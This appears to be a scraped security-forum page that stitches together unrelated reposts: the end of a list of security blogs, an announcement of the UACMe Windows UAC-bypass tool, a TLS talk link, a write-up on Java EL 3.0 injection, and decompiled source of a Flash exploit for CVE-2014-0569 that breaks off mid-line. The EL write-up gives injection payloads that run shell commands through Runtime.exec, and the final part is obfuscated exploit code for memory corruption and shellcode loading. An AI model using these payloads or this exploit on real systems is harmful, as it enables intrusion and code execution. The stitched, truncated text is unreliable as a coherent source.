fraud. [h=3]#55 Graham Cluley’s Security Blog[/h] Graham Cluley is an award winning cyber security blogger and independent computer security analyst. His blog reflects his knowledge and experience in the industry. [h=3]#56 GRC’s Security Now Podcast[/h] Security Now is a weekly podcast hosted by Steve Gibson and Leo Laporte. The show is sponsored by Gibson Research Corporation, a company specializing in data recovery and security. [h=3]#57 HotforSecurity[/h] This blog covers the sizzling world of computer security. You’ll find plenty of steamy stories from the dynamic world of internet fraud, scams, and malware. [h=3]#58 Imperva Blog[/h] From analyst reports to case studies, to blog posts and white papers, the Imperva blog keeps step with the latest malware and security threats. You’ll find information on DDoS, malware, and zero day threats. [h=3]#59 IT Knowledge Exchange – Security Bytes[/h] Written by the staff of SearchSecurity.com and Information Security magazine, Security Bytes covers topics across the spectrum of security, privacy and compliance. [h=3]#60 ItProPortal.com[/h] ITProPortal.com was one of the very first technology websites to launch in the UK back in 1999 and has grown to become one of the UK’s leading and most respected technology information resources. [h=3]#61 Lenny Zeltser On Information Security[/h] This blog by Lenny Zeltser focuses on information security. Lenny is a business and tech leader with extensive hands-on experience in IT and information security. [h=3]#62 Network Security Blog with Martin McKeay[/h] One man’s views on security, privacy – and anything else for that matter. Trends, information, news: you’ll find it all on the Network Security blog, and what’s more is it’s delivered with style. [h=3]#63 PandaLabs Cyber Security Blog[/h] This blog covers everything you need to know about internet threats. The PandaLabs blog keeps you abreast of the latest developments in cyber security. [h=3]#64 PaulDotCom[/h] PaulDotCom Security weekly’s mission is to provide free content within the subject matter of IT security news, vulnerabilities, hacking, and research. [h=3]#65 Privacy & Information Security Law Blog[/h] The views of one man on security, privacy and anything else that catches his attention. Security expert Martin McKeay talks about malware, privacy and security on this blog. [h=3]#66 Rational Survivability[/h] Hoff’s ramblings about information survivability, information centricity, risk management and disruptive innovation. Hoff was a CISSP, CISA, CISM and NSA IAM, he now spends the AMF money on coffee. [h=3]#67 Risky Business[/h] Risky.biz is another security podcast that focuses on covering recent developments in cyber security and the threat landscape. The show has been around since 2007, and takes a light approach to security news. [h=3]#68 Root Labs RDIST[/h] Their research provides cutting-edge insight into solving tough security problems. There are countless articles on the latest cyber security trends and threats. [h=3]#69 Seculert Blog[/h] The Seculert blog is a security blog with a focus on Advanced Persistent Threats and malware. There is no shortage of network security tips and insider information on the latest zero days. [h=3]#70 Security Street by Rapid7[/h] Rapid7 provides vulnerability management, compliance and penetration testing solutions for web applications, network and database security. Their community, Security Street covers all of these issues. [h=3]#71 Securosis Blog[/h] Securosis is the world’s leading independent security research and advisory firm, offering unparalleled insight and unique value to meet the challenges of managing security and compliance in a Web 2.0 world. [h=3]#72 SilverSky Altitude Blog[/h] SilverSky is a cloud security services provider with a lot of knowledge in the industry. Their blog, the Altitude blog, is updated regularly with news and information every security professional should be aware of. [h=3]#73 SpiberLabs Security Blog[/h] SpiderLabs is an elite team of ethical hackers, investigators and researchers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. The site covers the latest security news. [h=3]#74 Social-Engineering.org [/h] Social-Engineering.org is a cyber security blog that covers a wide range of security related topics. The site is also home to a podcast and a team of security professionals who share their expertise on all things security. [h=3]#75 The Security Skeptic[/h] The Security Skeptic blogs about all matters related to Internet Security, from domain names (DNS), firewalls and network security to phishing, malware and social engineering. [h=3]#76 Thought Crime Cyber Security Blog[/h] Moxie Marlinspike’s blog covers computer security and software development, particularly in the areas of secure protocols, cryptography, privacy, and anonymity. [h=3]#77 Troy Hunt’s Blog[/h] Software architect and Microsoft MVP, you’ll find Troy Hunt writing about security concepts and process improvement in software delivery. The quality of content found here makes this blog worth visiting. [h=2]PR4[/h] [h=3]#78 1 Raindrop[/h] Gunnar Peterson weaves his thoughts on distributed systems, security, and software together on his blog 1 Raindrop. The blog is both informative and insightful, and the coverage is on point. [h=3]#79 Andrew Hay’s Cyber Security Blog[/h] Andrew Hay is the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc. This is his personal blog where he talks about security and other news. [h=3]#80 Carnal Ownage[/h] Carnal Ownage is a must stop for security researchers and hackers alike. This cyber security blog goes into excruciating detail on attack methodology and highlights the threats your organization should be aware of. [h=3]#81 Command Line Kung Fu[/h] This blog covers fun, useful, interesting, security related (and non-security related) tips and tricks associated with the command line. Find tips on OS X, Linux and Windows. [h=3]#82 Dancho Danchev’s Blog[/h] This blog covers trends and fads, tactics and strategies, intersecting with third-party research, speculations and real-time CYBERINT assessments, all packed with sarcastic attitude. [h=3]#83 Darknet[/h] Don’t Learn to HACK – Hack to LEARN. That`s the motto at Darknet. The site covers ethical hacking, penetration testing, and computer security. Learn about interesting infosec related news, tools and more. [h=3]#84 Errata Security [/h] Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered on the blog, which covers a variety of topics and real world scenarios. [h=3]#85 Exotic Liability [/h] Chris Nickerson and Ryan Jones take it up a notch in their cyber security podcast. They routinely thumb their nose at the typical industry rhetoric and offer insight and commentary you won’t hear anywhere else. [h=3]#86 Hack Surfer[/h] HackSurfer was formed by a group of businessmen and women, engineers, mathematicians, linguists and information analysts with a passion for making simple, powerful use of big data. [h=3]#87 InfoSec Institute Resources[/h] The InfoSec Institute resources section has a broad selection of content and research on cyber security, threats, and of course, infosec. You’ll also find tutorials, training videos and more. [h=3]#88 J4vv4D Security Blog[/h] Javvad Malik has worked in information security for his entire career and covers different aspects of security on his blog, J4vv4D. He also regularly offers his insight through entertaining and informative YouTube videos. [h=3]#89 Liquid Matrix[/h] In a world that seems to be losing the notion of journalism, Liquidmatrix Security Digest remains committed to long form articles that dig into the major issues affecting the industry with Feature articles. [h=3]#90 Malcovery Security Blog[/h] This is Malcovery Security’s contribution to the knowledgebase of information security issues. They provide relevant insight and opinions on all of the newest threats faced by the industry. [h=3]#91 Malware Don’t Need Coffee[/h] Malware Don’t Need Coffee is a cyber security blog that focuses on malware research and provides educated commentary on all the latest exploits and security bugs. The site covers research in all areas of network security. [h=3]#92 McGrew Security Blog[/h] Wesley McGrew understands security and the nature of today’s digital landscape, especially its impact on infrastructure and business security. His blog covers all of the important cyber security stuff. [h=3]#93 Network Security Podcast[/h] Since 2007, the Network Security Podcast has been dishing out the dirt on cyber threats and security issues faced by the industry. It’s a great resource if you want to hear a discussion on what’s happening in infosec. [h=3]#94 New School Security[/h] This blog is inspired by the book and the movement towards a New School. The New School of Information Security is a book by Adam Shostack and Andrew Stewart, published in 2008. [h=3]#95 NoVA Infosec[/h] Founded in January of 2008 on a Saturday evening, NovaInfosec.com is dedicated to the community of Northern Virginia-, Washington, DC-, and southern Maryland-based security professionals. [h=3]#96 Packet Pushers Podcast[/h] The Packet Pushers Podcast offers deeply technical, hardcore discussions on the latest security trends. Co-hosts Greg Ferro and Ethan Banks lead the show with their many years of network engineering. [h=3]#97 Security Affairs[/h] Pierluigi Paganini is a company director, researcher, security evangelist, security analyst and freelance writer. His blog Security Affairs stays abreast of all the latest in cyber security. [h=3]#98 Security Bistro[/h] Security Bistro is where security experts come together for good talk, information on the latest ingenious threats and, one hopes, the latest clever ways to counter them. [h=3]#99 Security Geeks[/h] Find tips on computer security, choosing a password properly, and other practical online security tips. No shortage of interesting content circling the technology space here. [h=3]#100 Security Musings[/h] Gemini Security Solutions, Inc. is an information security consulting firm that applies creativity, passion, and insight to defend against today’s growing threats. Their blog, Security Musings, covers everything security. [h=3]#101 Security Uncorked[/h] Jennifer (Jabbusch) Minella aka JJ is a network security engineer and consultant with 15 years of experience. She shares her knowledge on infosec on her blog and offers plenty of information on the latest security trends. [h=3]#102 S!Ri.URZ[/h] This blog has been on the cyber security scene since as far back as 2006. The blog covers malware, rogues, ransomeware and everything else related to cyber security. [h=3]#103 The AShimmy Blog[/h] StillSecureAfterAllTheseYears.com (yes, a really long domain!) is the AShimmy Blog, Alan Shimel’s personal blogger blog on security, work, and family life. [h=3]#104 The Falcon’s View[/h] Ben Tomhave is a security professional that has served the industry in a variety of roles and security positions. This is reflected in his writing and the knowledge shared on his cyber security blog. [h=3]#105 The Harmony Guy[/h] You’ll find links and commentary related mostly to online privacy and security, particularly with social networking. The blog started back in 2007 and has been going ever since. [h=3]#106 The Southern Fried Security Podcast[/h] The SFS Podcast is designed to be an information security podcast that fills the gap between technical security podcasts and Security Now. This podcast offers respectful insight on the state of security. [h=3]#107 Uncommon Sense Security[/h] Small business information security has been an oxymoron for too long. Uncommon Sense Security is attempting to change that. The blog is entertaining, and informative at the same time. [h=2]PR3[/h] [h=3]#108 Andy Ellis — Protecting A Better Internet[/h] Andy Ellis is the Chief Security Officer of Akamai Technologies. Opinions here are mostly his own. His blog dives into the issues centered around cyber security and technology. [h=3]#109 DHS Daily Report[/h] A U.S. Army Retired Chief Warrant Officer with more than 40 years in information technology and 35 years in information security leads the charge on this blog, offering daily news on the industry. [h=3]#110 IT Security Expert by Dave Whitelegg[/h] The UK based IT Security Expert blog by Dave Whitelegg CISSP CCSP providing general Information Security advice & help in securing the home PC & home computer user, as well as business IT systems. [h=3]#111 IT Specialist[/h] A virtual community of social networks for IT professionals located throughout the world. A great way to connect and collaborate with others in the cyber security industry. [h=3]#112 MichaelPeters.org[/h] Michael D. Peters has been an independent information security consultant, executive, researcher, author, and catalyst with many years of information technology and shares that information on his site. [h=3]#113 Rivalhost Security Blog[/h] Rivalhost is a DDOS mitigation company and web host that takes an active stance on updating their customers and community with a mix of topics on technology, cyber security, and DDOS. [h=3]#114 Rud.is Security Blog[/h] This is a place to catch some opines on a pretty weird combination of topics. You’ll likely see topics ranging from IT/Information Risk Management to iOS, Node.js, and everything in-between. [h=3]#115 Security Xploded Blog[/h] SecurityXploded – the community division of XenArmor – is a popular Infosec Research & Development organization offering free security software, latest research articles and free cyber security training. [h=3]#116 Thom Langford’s Personal Security Blog[/h] An information security professional, award winning blogger, and industry commentator. Thom Langford talks about topics relating to information security, risk management and compliance. [h=3]#117 W. Mark Brooks IT Security Blog[/h] On his cyber security blog Brooks talks about mitigating risks and business strategies as they relate to IT. There is never a dull post and the author finds plenty of interesting security topics to dissect. [h=2]PR2[/h] [h=3]#118 Ethical Hacking[/h] Ehacking.net explores ethical hacking, penetration testing, and hacking. You’ll also find a wealth of tutorials on BackTrack and other penetration testing tips. An ideal site for information security researchers. [h=3]#119 IT Security Column[/h] An IT security blog that features general knowledge of IT security, online crime news, and tips on how to deal with online and computer threats. Plus, listings of information security threats and defenses. [h=3]#120 Kevin Townsend’s Cyber Security Blog[/h] This site is about computer and information security. It is maintained by Kevin Townsend, the original founder of ITsecurity.com and a freelance journalist and writer with more than 10 years experience. [h=3]#121 Psilva’s Prophecies[/h] Peter Silva covers security for F5 Networks Technical Marketing Team. With his theatre background and knowledge of security his blog makes for an interesting pit stop for security news. [h=3]#122 Websense Security Labs[/h] Websense Security Labs does a great job of sharing information and insight on the latest cyber security news. Their blog has been around since ’07. There is plenty of material to dig through for research. [h=2]PR1[/h] [h=3]#123 DDoS Protection & Cyber Security Blog[/h] A blog that centers around the threat posed by distributed denial of service (DDoS) attacks. You’ll find a news section that offers a snapshot of the latest security trends, as well as, epic posts highlighting the industry. [h=3]#124 Dave Waterson on Security[/h] Dave Waterson is an experienced IT security technologist, inventor of patented and patent-pending security technology in the anti-key logging and anti-phishing fields. [h=3]#125 Following The Wh1t3 Rabbit [/h] Rafal Los has been working in the defensive side of security for over 10 years. His blog, Following The Wh1t3 Rabbit, focuses on clearing the confusion around security and offering tools to improve security. [h=2]PR0[/h] [h=3]#126 FireEye Blog[/h] FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection. FireEye has been called a “hot security firm” — their blog backs that up. [h=3]# 127 How They Hack[/h] HowTheyHack is a general tech blog surrounding themes related to hacking and network security. Most of the posts are centered around tutorials, hacking news, security exploits and the author’s opinions. [h=3]# 128 Technology.info[/h] Technology.info combines the best of ITProPortal.com and IP EXPO, offering a resource for IT professionals and those interested in security. The boasts a wide variety of information security research and topics. Sursa: Top 100+ Cyber Security Blogs & Infosec Resources

UACMe - Defeating Windows User Account Control by EP_X0FF » Fri Dec 19, 2014 8:19 am Inspired by ITW WinNT/Pitou legacy MBR x86-64 bootkit dropper. Before anything else read this excellent work -> Windows 7 UAC whitelist, read it carefully as it explains everything especially why Windows User Account Control is a big fucken marketing joke from Microsoft just like DSE. Below is our variant of his work with removal of all C++ trash and adapting different UAC bypass method from WinNT/Pitou (bootkit authors also used as base Leo Davidson work). The only setting UAC somehow is able to show itself - if they are set on maximum. But here revealed another Microsoft UAC architecture flaw by design - even when it blocks something, it cannot properly determine what it blocked, representing possible malicious actions as taken by Microsoft, facepalm. Will you trust verified Microsoft action with verified digital certificate from Microsoft? Supported Windows version, all from 7xxx builds up to latest so "confidential" MS build 9901. Project overview: Win32 and x64 configurations. Compiled in MSVS 2013 U4, used pure C, compiled as C++ No additional dependencies. All libs in attach. Debug builds configurations present only for debugging stuff not for UAC bypass stage execution (shellcode will be screwed up). Require Heavens Gate adaptation for proper work from Win32 app under WOW64, if you don't know what is HG then skip this moment. x64 loader VT https://www.virustotal.com/en/file/78caa8fa31a802547b160f41c03fd825d01d1edcd064e06984d0cf84a3bc7813/analysis/1418968668/ x86-32 loader VT https://www.virustotal.com/en/file/97952e6bb9cb4b3c43215597be0bb1da504d2066fd1717c20d6fd64917311c06/analysis/1418968812/ Screeenshots taken from Windows 10 TP build 9901 uac101.png (325.47 KiB) Viewed 16 times uac102.png (215.73 KiB) Viewed 16 times Attachments UACME.rar pass: uacme(498.9 KiB) Downloaded 6 times Sursa: KernelMode.info • View topic - UACMe - Defeating Windows User Account Control

Java's SSLSocket:How Bad APIs Compromise Security Tale of a Frustrated Android Developer Dr. Georg Lukas <lukas@rt-solutions.de> A brief history of SSL/TLS Java TLS APIs: All-or-nothing security Making your (Android) application more secure TLS in the Post-Snowden Era\ Download: https://deepsec.net/docs/Slides/2014/Java%27s_SSLSocket_-_How_Bad_APIs_Compromise_Security_-_Georg_Lukas.pdf

[h=3]EL 3.0/Lambda Injection: Hacker Friendly Java[/h]The following article explains the mechanics of a code injection attack called EL3 Injection in applications that make use of the relatively new EL3 processor in java. New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution. Since the EL3 technology is relatively new it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face. [Note – The following article discusses a generic application-level coding flaw in modern Java applications, NOT a java 0-day. Keep on reading – the juicier RCE payloads are presented at the end] While trying to (and miserably failing at) create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the eclipse-based STS IDE version which supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5). Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only time consuming options of compiling the environment from scratch. Luckily, at some point, I decided to take a short break, and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting. Turns out that the newest java expression language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as operators, security restrictions on class access, and so on. A typical source code sample of using EL3 in a Servlet or JSP page would look something like: [TABLE=align: left] [TR] [TD]<%@page import="javax.el.ELProcessor"%> … <% ELProcessor elp = new ELProcessor(); Object msg = elp.eval("'Welcome' + user.name"); out.println(msg.toString()); %> [/TD] [/TR] [/TABLE] The ELProcessor dynamically evaluates the EL statement, and attempts to access the "name" fields of the Bean (or registered class) user. After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3, which includes the ELManager class methods importClass, importPackage and importStatic. These methods could be used to "import" various classes and even packages into the scope of the expression language, so they could be referenced within expressions. So in order to use classes in EL3 expressions, you'll need to include them using statements such as – [TABLE=align: left] [TR] [TD]elp.getELManager().importClass("java.io.File"); [/TD] [/TR] [/TABLE] This feature was implemented due to safety concerns (or in other words, security), to make sure that access to classes is presumably prevented for any class that was not also included in the page/project original EL imports AND application imports, so that even if developers will enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context. However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios – (1) If the developer already imported a class that the attacker needs into the EL context, and an attacker controlled input is used within the expression evaluation: [TABLE=align: left] [TR] [TD]Input1 = "File.listRoots()[0].getAbsolutePath()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); elp.getELManager().importClass("java.io.File"); Object path = elp.eval(input1); out.println(path); %> [/TD] [/TR] [/TABLE] (2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports: [TABLE=align: left] [TR] [TD]Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()" Input2 = "java.io.File"; [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); String input2 = request.getParameter("input2"); ELProcessor elp = new ELProcessor(); elp.getELManager().importClass(Input2); Object path = elp.eval(input1); out.println(path); %> [/TD] [/TR] [/TABLE] So, here you go. A nice exploit that will probably affect a couple of desolate apps, with super insecure code. Hardly worth its own classification. However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following , which explains the features of EL3 in great details.To make a long story short, watch the video and skip to 7:52. It's well worth your time. Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static type object and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros. They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime! JAVA.LANG! Seems like somebody there confused "user friendly" with "hacker friendly" J So, if for some reason, a user controlled input would stumble into an EL3 eval clause, which for some reason java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, than attackers could do a LOT more with no requirements on specific imports - [TABLE=align: left] [TR] [TD]Input1 = "System.getProperties()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(input1); out.println(sys); %> [/TD] [/TR] [/TABLE] Also, Instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example: [TABLE=align: left] [TR] [TD]Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(input1); out.println(sys); %> [/TD] [/TR] [/TABLE] An impact similar to that of the Spring's counterpart of EL injection, only in mainstream Java. Cool. Now we can shamelessly classify the attack and rest. But there's more! Although scenarios in which the user's input will get full control of the entire EL string are possible, they are much less common than scenarios in which user input might be integrated as a part of an EL string, in which case most of the previously mentioned payloads won't work. However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (. As its SQL counterpart functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression, and add additional expressions, with or without logical relations to each other. Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of expression, while using techniques similar to blind SQL injection. Don't think. Here's a couple of examples: [TABLE=align: left] [TR] [TD]Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(("'Welcome' + input1); out.println(sys); %> [/TD] [/TR] [/TABLE] [TABLE=align: left] [TR] [TD]Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor(" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(("SomeClass.StaticMethod( + input1 + ")"); out.println(sys); %> [/TD] [/TR] [/TABLE] So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire. So much for enhanced security features. We already identified a few instances that affect real world applications (no instances in core products, so far), and are currently handling them infront of the relevant entities. I'll probably invest some more time in the upcoming weeks to see if any prominent java projects are prone to this issue, but in the meantime, some practical notes: Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL related classes. Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exists in the wild. The mitigation is also simple, not embedding input into EL statements and validating input in case you do. I'll update this post as the research progresses. Cheers Posted by Shay Chen at 4:13 AM Sursa: Security Tools Benchmarking: EL 3.0/Lambda Injection: Hacker Friendly Java

[h=1]Exploit.SWF.CVE-2014-0569 Decoded Code[/h]By: physicaldrive0 on Dec 18th, 2014 [LIST=1]package { import flash.events.*; import flash.media.*; import flash.display.*; import flash.geom.*; import flash.utils.*; import flash.text.*; import flash.external.*; import flash.system.*; import flash.net.*; import __AS3__.vec.*; import avm2.intrinsics.memory.*; public class aeryk extends Sprite { private var mort5:Number; private var slotl:uint; private var larkr:uint = 233495534; private var crux1:uint = 200203949; private var whys3a:uint = 0x0800; private var orlyfx:Vector.<Object>; private var bios2t:Vector.<Object>; private var vola1:Sound; private var pokeg:ByteArray; private var magif:Vector.<Object>; private var rant2p:uint = 0; private var fray6u:Vector.<uint>; private var hugh1:uint; private var rugau8:uint; private var bonom:uint; private var gleeuo:uint; private var wombu3:uint; private var talis0:uint; private var dawnod:uint; private var fund2:uint; private var jump4:uint; private var dipseu:uint; private var buttkk:uint; private var modsj:uint; private var sobsft:uint; public function aeryk(){ var _loc2_ = 0; this.orlyfx = new Vector.<Object>(this.whys3a); this.bios2t = new Vector.<Object>(this.whys3a); this.magif = new Vector.<Object>(this.whys3a); super(); var _loc1_ = this.loaderInfo.parameters.kosoz; if ((((_loc1_ == null)) || (!(this.pawn2c(116, 150))))){ return; }; this.vola1 = new Sound(); this.pokeg = new ByteArray(); this.pokeg.endian = Endian.LITTLE_ENDIAN; this.pokeg.length = 65536; this.birdzu(); try { this.want2d(_loc1_); } catch(error:Error) { return; }; this.pisa8(); try { var _local2 = this.manei(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.textline(1, "point4.5"); _local2 = this.grity(); _loc2_ = _local2; if (_local2 != 0){ this.textline(1, "premature exit, 4.5"); this.quodo0(); return; }; if (!(this.midin())){ this.quodo0(); return; }; if (!(this.weilwk())){ this.quodo0(); return; }; _local2 = this.modo55(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.gadsi(); this.kahncl(); this.quodo0(); } catch(error:Error) { textline(2, ((("errormsg: " + error.name) + " ") + error.message)); return; }; } public function textline(lnum:uint, text:String):void{ } public function pawn2c(param1:Number, param2:Number):Boolean{ var _loc3_ = Capabilities.version.toLowerCase().split(" "); if (_loc3_[0] != "win"){ return (false); }; this.mort5 = Number(_loc3_[1].substr(0, 4).split(",").join("")); if ((((this.mort5 < param1)) && ((this.mort5 > param2)))){ return (false); }; return (true); } private function birdzu():void{ this.slotl = 0x90909090; } public function hexdump(bytes:ByteArray, start:uint=1, length:uint=0):String{ var byte:int; var output:String = ""; var charbuf:String = ""; if (start == 0){ start = 1; }; if ((((length > bytes.length)) || ((length == 0)))){ length = bytes.length; }; bytes.position = (start - 1); var i:int = start; while (i < (length + 1)) { byte = bytes.readByte(); if ((((byte > 20)) && ((byte < 123)))){ charbuf = (charbuf + String.fromCharCode(byte)); } else { charbuf = (charbuf + "."); }; output = (output + (this.byte2hex(byte) + " ")); if ((i % 16) == 0){ output = (output + (("\t" + charbuf) + "\n")); charbuf = ""; }; i++; }; if ((i % 16) != 0){ while ((i % 16) != 0) { output = (output + " "); i++; }; output = (output + " "); output = (output + (("\t" + charbuf) + "\n")); }; return (output); } public function byte2hex(byte:uint):String{ var hex:String = ""; var arr:String = "FEDCBA"; var i:uint; while (i < 2) { if (((byte & (240 >> (i * 4))) >> (4 - (i * 4))) > 9){ hex = (hex + arr.charAt((15 - ((byte & (240 >> (i * 4))) >> (4 - (i * 4)))))); } else { hex = (hex + String(((byte & (240 >> (i * 4))) >> (4 - (i * 4))))); }; i++; }; return (hex); } private function want2d(param1:String):void{ var _loc4_:uint; var _loc5_:uint; var _loc6_ = 0; var _loc2_ = "_w2fPjM9CaS1b-KWLkcpATG8IuelEJR7ovm3hndqQ5D6XUF0ztgONiyxYrsBV4ZH"; this.pokeg.position = 1208; var _loc3_:uint; var n:ByteArray = new ByteArray(); n.length = (param1.length + 1); while (_loc3_ < param1.length) { _loc4_ = 0; _loc5_ = 0; while (_loc5_ < 4) { _loc6_ = _loc2_.indexOf(param1.charAt((_loc3_ + _loc5_))); _loc6_ = (_loc6_ & 63); _loc4_ = (_loc4_ | (_loc6_ << ((3 - _loc5_) * 6))); _loc5_++; }; _loc5_ = 0; while (_loc5_ < 3) { this.pokeg.writeByte(((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF)); n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc5_++; }; n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc3_ = (_loc3_ + 4); }; this.textline(1, "try hexdump"); this.textline(3, this.hexdump(this.pokeg, 1208, param1.length)); this.textline(1, "try done"); } private function pisa8():void{ var _loc1_:ByteArray; var _loc2_:Vector.<uint>; var _loc3_:uint; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.magif[_loc3_] = new Vector.<Object>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.bios2t[_loc3_] = new Vector.<uint>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { _loc2_ = (this.bios2t[_loc3_] as Vector.<uint>); _loc2_.length = 1022; _loc2_[0] = this.crux1; _loc2_[1] = _loc3_; _loc1_ = new ByteArray(); _loc1_.length = 0x1000; _loc1_.endian = Endian.LITTLE_ENDIAN; _loc1_.position = 8; _loc1_.writeUnsignedInt(this.larkr); _loc1_.writeUnsignedInt(_loc3_); this.orlyfx[_loc3_] = _loc1_; _loc3_++; }; } private function manei():uint{ var pos:uint; var _loc2_:uint; var _loc3_:ByteArray; var _loc4_:Vector.<uint>; pos = uint((this.whys3a / 2)); var startpos:uint = pos; while (pos < this.whys3a) { _loc3_ = (this.orlyfx[pos] as ByteArray); ApplicationDomain.currentDomain.domainMemory = _loc3_; _loc3_.atomicCompareAndSwapLength(0x1000, 0); if (casi32(0x1000, 1022, 0x40000001) == 1022){ _loc2_ = (uint((this.whys3a / 2)) - 0x0100); while (_loc2_ < this.whys3a) { _loc4_ = (this.bios2t[_loc2_] as Vector.<uint>); if (_loc4_.length == 0x40000001){ this.fray6u = _loc4_; return (0); }; _loc2_++; }; }; pos++; }; return (1); } private function quodo0():void{ if (this.fray6u){ if (((this.bonom) && (this.gleeuo))){ this.sacs1y(this.bonom, this.gleeuo); }; if (this.rugau8){ this.fray6u[1073741823] = this.rugau8; }; this.fray6u[1073741822] = 1022; } else { do { } while (1); }; } public function fullk(param1:uint, param2:uint, param3:uint):uint{ var _loc4_:uint = (param1 >>> (8 * param3)); var _loc5_:uint = (((param3 == 0)) ? 0 : (param2 << ((4 - param3) * 8))); return ((_loc5_ | _loc4_)); } public function intog(param1:uint):uint{ var _loc2_:uint; var _loc3_:uint = (param1 % 4); param1 = (param1 - _loc3_); if (param1 >= this.hugh1){ _loc2_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc2_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; var _loc4_:uint = this.fray6u[_loc2_]; if (_loc3_ == 0){ return (_loc4_); }; var _loc5_:uint = this.fray6u[(_loc2_ + 1)]; return (this.fullk(_loc4_, _loc5_, _loc3_)); } public function sacs1y(param1:uint, param2:uint):void{ var _loc3_:uint; if (param1 >= this.hugh1){ _loc3_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc3_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; this.fray6u[_loc3_] = param2; } private function boobe():void{ var _loc2_:Vector.<Object>; var _loc1_:uint; while ((((_loc1_ < 30)) && ((this.rant2p < this.whys3a)))) { _loc2_ = (this.magif[this.rant2p] as Vector.<Object>); _loc2_.length = 30; _loc2_[1] = this.vola1; _loc2_[2] = this.pokeg; this.rant2p++; _loc1_++; }; } private function grity():uint{ var _loc1_:uint; var _loc2_:uint; var _loc3_:uint; var _loc4_:ByteArray; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; _loc1_ = 1; while (_loc1_ < 16) { _loc2_ = (_loc1_ * 0x0400); if (((!(this.hugh1)) && ((this.fray6u[_loc2_] == this.larkr)))){ _loc3_ = this.fray6u[(_loc2_ + 1)]; _loc4_ = (this.orlyfx[_loc3_] as ByteArray); _loc4_.clear(); _loc5_ = 0; while (this.fray6u[_loc2_] == this.larkr) { this.boobe(); if (_loc5_ == 30){ return (5); }; _loc5_++; }; if (((((!((this.fray6u[_loc2_] == this.larkr))) && ((this.fray6u[(((this.mort5 <= 111)) ? (_loc2_ + 2) : (_loc2_ - 1))] == 128)))) && (!(((_loc6_ = this.fray6u[(_loc2_ + 9)]) == 0))))){ this.hugh1 = ((_loc6_ & 0xFFFFF000) - (_loc1_ * 0x1000)); if (this.hugh1 < 65536){ return (6); }; if ((((((this.intog((_loc6_ + 